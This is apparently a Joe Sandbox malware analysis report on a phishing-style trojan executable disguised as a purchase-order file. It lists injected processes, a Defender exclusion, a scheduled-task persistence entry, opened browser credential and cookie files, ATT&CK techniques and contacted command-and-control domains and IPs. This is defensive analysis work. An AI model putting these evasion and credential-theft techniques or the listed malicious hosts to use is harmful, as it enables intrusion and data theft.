                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll | VolumeInformation
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Queries volume information: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | VolumeInformation
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography | MachineGuid

                      Stealing of Sensitive Information

Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2942858170.0000000002910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2942772610.00000000028C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.2944930407.0000000005280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2082286321.0000000003CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2943135814.0000000002270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2070855400.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3ed5828.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.56c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.56c0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3ed5828.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1808502142.0000000003ED5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1808502142.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1812017169.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\runas.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\runas.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\runas.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\runas.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\runas.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\runas.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\runas.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\runas.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\runas.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                      Remote Access Functionality

Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2942858170.0000000002910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2942772610.00000000028C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.2944930407.0000000005280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2082286321.0000000003CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2943135814.0000000002270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2070855400.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3ed5828.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.56c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.56c0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3ed5828.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1808502142.0000000003ED5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1808502142.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1812017169.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (reconstructed from the flattened 14-column table; one line per tactic, cells listed top to bottom; the numeric badges that the report attaches to techniques matched by this sample are reproduced in square brackets as extracted)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Scheduled Task/Job [11]; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: Scheduled Task/Job [11]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Process Injection [612]; Scheduled Task/Job [11]; Abuse Elevation Control Mechanism [1]; DLL Side-Loading [1]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Masquerading [1]; Disable or Modify Tools [11]; Virtualization/Sandbox Evasion [41]; Process Injection [612]; Deobfuscate/Decode Files or Information [11]; Abuse Elevation Control Mechanism [1]; Obfuscated Files or Information [4]; Software Packing [22]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping [1]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: Security Software Discovery [221]; Process Discovery [2]; Virtualization/Sandbox Evasion [41]; Application Window Discovery [1]; File and Directory Discovery [2]; System Information Discovery [113]; Remote System Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Email Collection [1]; Archive Collected Data [11]; Data from Local System [1]; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Encrypted Channel [1]; Ingress Tool Transfer [3]; Non-Application Layer Protocol [4]; Application Layer Protocol [4]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1563935; Sample: Pre Alert PO TVKJEANSA00967.bat.exe; Startdate: 27/11/2024; Architecture: WINDOWS; Score: 100). The rendered graph is not recoverable; its process tree, dropped files, signatures and network contacts read as follows:

- Sample level: www.shipincheshi.today; www.elinor.club; 4 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Sigma detected: Scheduled temp file as task from temp location; Multi AV Scanner detection for submitted file; 11 other signatures.
- Pre Alert PO TVKJEANSA00967.bat.exe (started): drops C:\Users\user\AppData\...\STiokuWkiGFJ.exe (PE32), C:\Users\...\STiokuWkiGFJ.exe:Zone.Identifier (ASCII), C:\Users\user\AppData\Local\...\tmp63ED.tmp (XML), Pre Alert PO TVKJEANSA00967.bat.exe.log (ASCII). Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes. Starts RegSvcs.exe, powershell.exe (two instances) and schtasks.exe.
- STiokuWkiGFJ.exe (started): Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file. Starts schtasks.exe and RegSvcs.exe.
- RegSvcs.exe: Maps a DLL or memory area into another process. Injects into nhClcdOjQwJ.exe.
- powershell.exe: Loading BitLocker PowerShell Module. Starts WmiPrvSE.exe and conhost.exe; the second powershell.exe and both schtasks.exe instances each start conhost.exe.
- nhClcdOjQwJ.exe (injected): Found direct / indirect Syscall (likely to bypass EDR). Starts runas.exe.
- runas.exe: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures. Injects into nhClcdOjQwJ.exe; starts firefox.exe.
- nhClcdOjQwJ.exe (injected by runas.exe): contacts dojodigitize.shop 15.197.142.173, 49743, 80 (TANDEMUS, United States); www.alvinsd.buzz 139.162.181.76, 49803, 49810, 49817 (LINODE-AP Linode LLC US, Netherlands); 3 other IPs or domains. Found direct / indirect Syscall (likely to bypass EDR).



Source | Detection | Scanner | Label
Pre Alert PO TVKJEANSA00967.bat.exe | 55% | ReversingLabs | ByteCode-MSIL.Trojan.Genie8DN
Pre Alert PO TVKJEANSA00967.bat.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | 55% | ReversingLabs | ByteCode-MSIL.Trojan.Genie8DN

No Antivirus matches
No Antivirus matches
                                                                                    high
                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icorunas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://elinor.club/7plr/?fvqp6=9vfXK&LRW=r9AVpTZFPDO8VTu/ciknjINDVEp/PvrjGtBP7U8RvBiODJ3oM2lLrunas.exe, 00000012.00000002.2943817151.000000000550C000.00000004.10000000.00040000.00000000.sdmp, nhClcdOjQwJ.exe, 00000013.00000002.2943382450.000000000387C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://www.ecosia.org/newtab/runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.chiark.greenend.org.uk/~sgtatham/putty/0Pre Alert PO TVKJEANSA00967.bat.exe, STiokuWkiGFJ.exe.0.drfalse
                                                                                            high
                                                                                            http://www.carterandcone.comlPre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://ac.ecosia.org/autocomplete?q=runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.fontbureau.com/designers/cabarga.htmlNPre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.founder.com.cn/cnPre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.fontbureau.com/designers/frere-user.htmlPre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.thinkphp.cnrunas.exe, 00000012.00000002.2943817151.000000000537A000.00000004.10000000.00040000.00000000.sdmp, nhClcdOjQwJ.exe, 00000013.00000002.2943382450.00000000036EA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://www.jiyu-kobo.co.jp/Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.fontbureau.com/designers8Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs
                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                            38.6.78.235
                                                                                                            www.17jkgl.comUnited States
                                                                                                            174COGENT-174UStrue
                                                                                                            15.197.142.173
                                                                                                            dojodigitize.shopUnited States
                                                                                                            7430TANDEMUStrue
                                                                                                            194.58.112.174
                                                                                                            www.elinor.clubRussian Federation
                                                                                                            197695AS-REGRUtrue
                                                                                                            154.23.176.197
                                                                                                            www.shipincheshi.todayUnited States
                                                                                                            174COGENT-174UStrue
                                                                                                            139.162.181.76
                                                                                                            www.alvinsd.buzzNetherlands
                                                                                                            63949LINODE-APLinodeLLCUStrue
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1563935
Start date and time: 2024-11-27 16:41:34 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 10s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Pre Alert PO TVKJEANSA00967.bat.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@23/16@5/5
EGA Information:
• Successful, ratio: 83.3%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 105
• Number of non-executed functions: 303
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Pre Alert PO TVKJEANSA00967.bat.exe
Time      Type             Description
10:42:27  API Interceptor  2x Sleep call for process: Pre Alert PO TVKJEANSA00967.bat.exe modified
10:42:35  API Interceptor  43x Sleep call for process: powershell.exe modified
10:42:39  API Interceptor  2x Sleep call for process: STiokuWkiGFJ.exe modified
10:43:40  API Interceptor  1512247x Sleep call for process: runas.exe modified
15:42:36  Task Scheduler   Run new task: STiokuWkiGFJ, path: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe
                                                                                                            No context
                                                                                                            No context
                                                                                                            Process:C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1216
                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
